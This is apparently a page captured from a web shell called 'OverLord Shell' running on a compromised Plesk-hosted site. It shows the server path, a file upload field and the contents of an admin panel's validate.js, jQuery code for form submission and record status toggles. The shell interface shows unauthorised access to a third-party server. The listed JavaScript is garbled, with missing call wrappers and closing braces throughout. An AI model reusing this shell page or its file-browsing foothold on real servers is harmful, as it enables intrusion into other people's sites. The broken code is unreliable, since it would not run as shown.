OverLord Shell

Path : G:/PleskVhosts/jaincensus.com/macciaweb.ultraliant.com/businessforum/
File Upload :
Current File : G:/PleskVhosts/jaincensus.com/macciaweb.ultraliant.com/businessforum/validate.js

currPage = $(location).attr('href').split('?')[0].split('/');
currPage = currPage[currPage.length - 1];
currPageNm = currPage.substr(0, currPage.length - 4);
currPageAdd = currPage.substr(0, currPage.length - 7);
currPageEdit = currPage.substr(0, currPage.length - 8);

function valAdd() {
        modules: 'file,security',
        form: '#addform',
        scrollToTopOnError: false,
        onSuccess: function() {
            $('#addform button[type=submit]').button('loading');
            $('#addform button[type=reset]').attr('disabled', 'disabled');
                type: 'POST',
                url: currPageAdd + 'add_save.php',
                data: new FormData($('#addform')[0]),
                contentType: false,
                processData: false,
                success: function(data) {
                    if (data == 'success') {
                        location = currPageAdd + '.php?msg=add_success';
                    } else if (data.substr(data.length - 4) == '.php') location = data;
                    else {
                        $('#addform button[type=submit]').button('reset');
                        $('#addform button[type=reset]').removeAttr('disabled');
            return false;

function valEdit() {
        modules: 'file,security',
        form: '#updateform',
        scrollToTopOnError: false,
        onSuccess: function() {
            $('#updateform button[type=submit]').button('loading');
            $('#updateform button[type=reset]').attr('disabled', 'disabled');
                type: 'POST',
                url: currPageEdit + 'edit_save.php',
                data: new FormData($('#updateform')[0]),
                contentType: false,
                processData: false,
                success: function(data) {
                     var res = data.split(".");
                    if ($.trim(data)=='success') {
                        location = currPageEdit + '.php?msg=add_success';
                    } else if ($.trim(res[0])== 'success') {
                           location = currPage + '?msg=add_success';
                  else if (data.substr(data.length - 4) == '.php') location = data;
                    else {
                        $('#updateform button[type=submit]').button('reset');
                        $('#updateform button[type=reset]').removeAttr('disabled');
            return false;
$('.delbtn').click(function() {
	if (confirm("Are you sure, do you want to change status of this record?")) {
        $this = $(this);
        if (($this.html()).indexOf('Disable') != -1) btnval = 'n';
        else btnval = 'y';
        $.post(currPageNm + '_lock.php', {
            action: btnval,
            id: $this.val()
        }, function(data) {
            if (data.trim()== 'y'){ $this.html('Make Disable<i class="fa fa-close mlm"></i>').removeClass('btn-success').addClass('btn-danger');
			}else if(data.trim() == 'n') {$this.html('Make Enable<i class="fa fa-check mlm"></i>').removeClass('btn-danger').addClass('btn-success');
			}else if(data.substr(data.length - 4) == '.php') { location = data;
			}else{ alert(data);}
    } else return false;

$('.recyclebtn').click(function() {
    if (confirm('Do you want to delete this record?')) {
        $this = $(this);
        if (($this.html()).indexOf('Disable') != -1) btnval = 'n';
        else btnval = 'y'; $.post(currPageNm + '_recycle.php', {
           // action: btnval,
            id: $this.val()
        }, function(data) {
			if(data.trim() == "Success")
				window.location = currPage + '?msg=delete_success';
    } else return false;

$('.featured').click(function() {
    if (confirm('Do you want to make this record default?')) {
        $this = $(this);
        if (($this.html()).indexOf('Disable') != -1) btnval = 'n';
        else btnval = 'y';
        $.post(currPageNm + '_default.php', {
            id: $this.val()
        }, function(data) {
			if(data.trim() == "success"){
window.location = currPage + '?msg=default_success';
    } else return false;

$('.approved').click(function() {
	if (confirm("Are you sure, do you want to change status of this record?")) {
        $this = $(this);
        if (($this.html()).indexOf('Mark as') != -1) btnval = '1';
        else btnval = '0';
        $.post(currPageNm + '_approved.php', {
            action: btnval,
            id: $this.val()
        }, function(data) {
			  if (data.trim() == '0') $this.html('Mark as Approved<i class="fa fa-thumbs-o-up mlm"></i>').removeClass('btn-info').addClass('btn-default');
            else if (data.trim() == '1') $this.html('Approved<i class="fa fa-thumbs-up mlm"></i>').removeClass('btn-default').addClass('btn-info');
            else if (data.substr(data.length - 4) == '.php') location = data.trim();
            else alert(data);
    } else return false;

$('.verified').click(function() {
	if (confirm("Are you sure, do you want to change status of this record?")) {
        $this = $(this);
        if (($this.html()).indexOf('Mark as') != -1) btnval = '1';
        else btnval = '0';
        $.post(currPageNm + '_verified.php', {
            action: btnval,
            id: $this.val()
        }, function(data) {
            if (data.trim() == '0') $this.html('Mark as Verified<i class="fa fa-check-square-o mlm"></i>').removeClass('btn-success').addClass('btn-purple');
            else if (data.trim() == '1') $this.html('Verified<i class="fa fa-check-square mlm"></i>').removeClass('btn-purple').addClass('btn-success');
            else if (data.trim().substr(data.trim().length - 4) == '.php') location = data.trim();
            else alert(data.trim());
    } else return false;

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